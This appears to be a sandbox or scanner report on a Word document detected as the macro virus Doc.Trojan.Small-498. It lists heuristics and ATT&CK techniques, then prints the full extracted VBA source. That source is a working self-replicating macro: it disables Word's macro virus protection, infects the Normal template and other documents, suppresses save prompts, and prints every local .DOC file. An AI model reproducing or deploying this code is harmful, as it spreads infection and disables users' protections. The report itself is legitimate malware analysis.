MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with a Document_Open subroutine, which is a common technique for executing malicious code upon opening a document. The script explicitly attempts to disable 'VirusProtection' and then proceeds to print all files with a .DOC extension in the local directory. This behavior suggests a destructive or disruptive intent, possibly framed as a contest entry as indicated by the document body text.
Heuristics 4
-
ClamAV: Doc.Trojan.Small-498 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Small-498
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://pegasus.cc.ucf.edu/~kes65601 In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1685 bytes |
SHA-256: ba527b1ff5114cd5522ec05d35936c7cb7de5e2912ac794c1422b19f6e37e260 |
|||
|
Detection
ClamAV:
Doc.Trojan.Small-498
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' Disable Macro Protection
Options.VirusProtection = (1 + 2 - 3):
' Copy Active to Normal
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
ActiveDocument.VBProject.VBComponents.Item(1).Export ("SkamWerks")
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
Options.SaveNormalPrompt = (-2 + 2)
' Copy From Normal to Active
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'Payload - Print Out All Docs in Local Directory.
myDoc = Dir("*.DOC"): While myDoc <> "": Application.PrintOut FileName:=myDoc: myDoc = Dir(): Wend
End If
End Sub
' SmallWorld Virii - By Skammy of SkamWerks! http://pegasus.cc.ucf.edu/~kes65601
' Written for the sole purpose of the Smallest Word Class Macro Virii Contest!
' Please do not distrubute!
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.